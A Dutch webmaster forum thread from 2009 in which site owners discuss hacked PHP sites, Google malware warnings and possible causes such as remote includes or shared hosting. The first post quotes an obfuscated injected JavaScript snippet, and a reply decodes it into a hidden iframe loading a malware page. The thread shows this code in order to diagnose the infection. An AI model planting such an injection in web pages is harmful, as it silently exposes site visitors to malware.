login  Naam:   Wachtwoord: 
Registreer je!
 Forum

Viruswaarschuwing www.slamdunk97.nl

Offline Rens - 06/04/2009 16:03
Avatar van RensGouden medaille

Crew algemeen		 Beste,
Sinds kort krijgen wij op een site rare verschijnselen. Het gaat hier over de site http://www.slamdunk97.nl. Een vriend van mij kan niet meer op de site komen, ik nog wel.

Vorige keer dat ik tussen de files keek stonden er ineens enkele mappen en bestanden in die hij en ik allebei niet gemaakt hebben. Ze zijn er dus op de 1 of andere manier op gekomen.

Nu hebben we zelfs een email gekregen van Google dat de site onveilig is op sommige pagina's. De pagina's die in de mail stonden zijn index.php en leden/index.php

Heb zojuist in leden/index.php gekeken en daar stond een code in die ik er zelf niet ingezet heb:
javascript code - Bekijk de code zonder highlighting - Klap code in 
  1. <!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write('' unescape('<') String.fromCharCode(105) '' 'fram' unescape('e id') '=' '"' '1' String.fromCharCode(48) String.fromCharCode(55) String.fromCharCode(99) String.fromCharCode(97) '' unescape('4') String.fromCharCode(101) String.fromCharCode(52) String.fromCharCode(54) String.fromCharCode(98) '' String.fromCharCode(49) String.fromCharCode(48) String.fromCharCode(56) '' String.fromCharCode(50) String.fromCharCode(102) String.fromCharCode(98) '' unescape('eae') '8d' unescape('7522') String.fromCharCode(53) String.fromCharCode(101) String.fromCharCode(53) '' unescape('cb') String.fromCharCode(55) String.fromCharCode(53) String.fromCharCode(34) '' unescape(' ') 'name' '="a' String.fromCharCode(56) '' String.fromCharCode(50) String.fromCharCode(57) String.fromCharCode(101) '' String.fromCharCode(99) '' String.fromCharCode(52) String.fromCharCode(53) String.fromCharCode(52) '' '27' unescape('6') 'f' unescape('4') String.fromCharCode(97) String.fromCharCode(53) String.fromCharCode(56) '' unescape('e') unescape('9') unescape('ac7') '1b2' 'c516' unescape('a') unescape('e2"') unescape(' ') unescape(' w') 'i' 'dth=' unescape('1 he') String.fromCharCode(105) String.fromCharCode(103) '' String.fromCharCode(104) String.fromCharCode(116) String.fromCharCode(61) String.fromCharCode(49) '' String.fromCharCode(32) '' unescape('f') 'ram' 'e' unescape('bor') 'd' 'er=' String.fromCharCode(48) '' ' src' '=' '"' unescape('h') String.fromCharCode(116) String.fromCharCode(116) String.fromCharCode(112) '' '://b' String.fromCharCode(105) String.fromCharCode(122) String.fromCharCode(111) String.fromCharCode(112) '' unescape('lata') '.' String.fromCharCode(114) String.fromCharCode(117) String.fromCharCode(47) String.fromCharCode(112) '' unescape('ay.') String.fromCharCode(104) String.fromCharCode(116) String.fromCharCode(109) String.fromCharCode(108) '' String.fromCharCode(34) String.fromCharCode(62) '' unescape('</') unescape('if') unescape('rame>') '');</SCRIPT><!-- /ad -->


Heb de code er uitgehaald en het bestand er opnieuw opgezet, toch blijft de code telkens terugkomen.

De code van leden/index.php:
http://www.plaatscode.be/130355/

Kan iemand mij vertellen waar dit door komt?
Voor zover ik weet zit er geen fout in de pagina en er kan niks worden geupload via user forms op de hele site...

Alvast bedankt,
Rens

16 antwoorden

Gesponsorde links
Offline Ontani - 06/04/2009 16:05 (laatste wijziging 06/04/2009 16:10)
Avatar van Ontani Gouden medailleGouden medailleGouden medailleGouden medaille

-1		 Ook geen actie van je host die dit op elke pagina toevoegd?

Het rare is ook dat hij hier geen melding van geeft als je via de volgende url de website bezoekt:
http://217.170.21.123/~slamdunk/

Behalve hier dan weer wel:
http://217.170....eden/login

Dan krijg je ook expliciet de melding:
De website op 217.170.21.123 bevat elementen van de site bizoplata.ru, die malware lijkt te hosten.
Offline Rens - 06/04/2009 16:11 (laatste wijziging 06/04/2009 16:12)
Avatar van Rens Gouden medaille

Crew algemeen		 Nee.
Was hem nog tegengekomen op leden/login.php en verder nergens...

edit; Nu word de code niet meer weergeven.
Toch blijf ik het raar vinden dat die code er wel ineens in stond...
Offline Ontani - 06/04/2009 16:13
Avatar van Ontani Gouden medailleGouden medailleGouden medailleGouden medaille

-1		 Ook niemand van je admins die effe "geld" wilt verdienen met dit soort reclame. Anders eens naar de access-log's van je host kijken.
Offline Rens - 06/04/2009 16:18
Avatar van Rens Gouden medaille

Crew algemeen		 Die vriend van mij en ik zijn de enigen die toegang hebben tot de bestanden en dus ook de enigen die iets kunnen wijzigen.
Hij is zeker niet degene die dat gedaan heeft, dat weet ik 100% zeker...
Offline Martijn - 06/04/2009 16:26
Avatar van Martijn Crew PHP als je er iets aan hebt
Offline ArieMedia - 06/04/2009 16:28
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde		 Waarschijnlijk heeft iemand via een extern script iets op je server gepropt. Tenminste dat lijkt mij het meest waarschijnlijke. Je site staat ook geindexeerd als "aanvalspagina".

Kijk eens goed je server door of er niet ergens een onbekend bestand staat.
Offline Ontani - 06/04/2009 16:41
Avatar van Ontani Gouden medailleGouden medailleGouden medailleGouden medaille

-1		 Aan die pagina die deviour laat zien kan je zien dat meerdere sites op je webhost zijn geblacklist wat laat vermoeden dat er ergens op de shared host waar je zit iets mis loopt. Check even of je niet al je files op 777 hebt staan dat tenminste geen andere shared hosters aan je bestanden kunnen knoeien.
Offline ibmos2warp - 06/04/2009 19:36
Avatar van ibmos2warp PHP interesse
Ontani schreef:
Aan die pagina die deviour laat zien kan je zien dat meerdere sites op je webhost zijn geblacklist wat laat vermoeden dat er ergens op de shared host waar je zit iets mis loopt.

Nietwaar, die staan totaal ergens anders gehost. Die code is gewoon op die sites ook gevonden.

Het is waarschijnlijk gewoon een remote include. Die javascript code is overigs erg slecht, Opera voert die niet zonder aanpassingen uit.
De code die gemaakt wordt met die js is:
html code - Bekijk de code zonder highlighting - Klap code in 
  1. <iframe id="107ca4e46b1082fbeae8d75225e5cb75" name="a829ec454276f4a58e9ac71b2c516ae2"  width=1 height=1 frameborder=0+src="http://bizoplata.ru/pay.html"></iframe>

En die site staat weer op de pagina van Google die DeviourSoul heeft gevoden.

Mag ik verder nog even opmerken dat je moet oppassen met PHP_SELF en dat ereg oud is, dat je beter als je het per se nodig hebt (heb je niet) preg_* functie's en anders string functie's (die moet jij gebruiken).
Offline Rens - 06/04/2009 23:45
Avatar van Rens Gouden medaille

Crew algemeen		 Hetgeen wat jij laat zien als voorbeeld werkt bij mij niet:
http://www.slam...t;/form>;
Heb een array met alle toegestane pagina's en er wordt dus gekeken of die pagina in de array staat.
Als er iets aan de URL veranderd wordt klopt het niet meer...
Offline bertushka - 16/04/2009 19:18
Avatar van bertushka Lid ikzelf heb ook zoiets aan de hand gehad. gecrackt...codes op mijn website gezet zonder dat ik er iets van afwist. naar mijn provider gebeld eerst, die codes weggehaalt, stonden er nog codes boven mijn <head> die ook weggehaald. maar als ik nu via google naar mijn site zoek. staat die wel geïndexeerd, maar klik ik erop krijg ik tevoorschijn "deze pagina kan niet gevonden worden" refresh ik komt ze wel tevoorschijn. typ ik de site in mijn adresbalk lukt het ook. met andere woorden... zoveel werk gedaan en ik krijg ze maar niet aan de praat, echt vervelend. als iemand weet wat er mis is mag je dat zeker meedelen. voor de geïntereseerden, de website is http://www.online-koopjes.eu

ik zou die mens die mij kan helpen een vat kunnen geven van blijdschap denk ik! :-)
Offline Ibrahim - 17/04/2009 21:26
Avatar van Ibrahim PHP expert Doe eens wat Ontani heeft voorgesteld. Ik gok er ook op dat iemand op je shared server "business" op heeft staan die niet echt "honest" zijn.
Offline bertushka - 17/04/2009 23:09
Avatar van bertushka Lid nee ik zie daar toch niets speciaals opstaan. bij safebrowsing krijg ik ook geen melding van een aanval op mijn website ofzo.
Offline marten - 17/04/2009 23:12
Avatar van marten Beheerder online koopjes krijg ik wel een melding als ik de in_cache versie van google bekijk.
Offline bertushka - 18/04/2009 09:28
Avatar van bertushka Lid en welke melding krijg jij dan?
Offline marten - 18/04/2009 10:13
Avatar van marten Beheerder
Citaat:
Waarschuwing: het bezoeken van deze site kan uw computer beschadigen.
De website op 74.125.77.132 bevat elementen van de site 72.11.142.219, die malware lijkt te hosten. Dat is software die uw computer kan beschadigen of zonder uw medeweten acties kan uitvoeren. Als u een site die malware bevat alleen al bezoekt, kan uw computer worden geïnfecteerd.
Ga voor meer informatie over de problemen met deze elementen naar de Diagnosepagina voor Safe Browsing van Google voor 72.11.142.219.
Meer informatie over hoe u uzelf online kunt beschermen tegen schadelijke software.
Ik begrijp dat het bezoeken van deze site mijn computer kan beschadigen.
Offline bertushka - 18/04/2009 10:38
Avatar van bertushka Lid wat is jullie advies dan.... veranderen van provider?
want ik heb deze al misschien 20 keer gebeld over dit probleem, maar daar kunnen ze mij precies ook niet verder helpen.
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.181s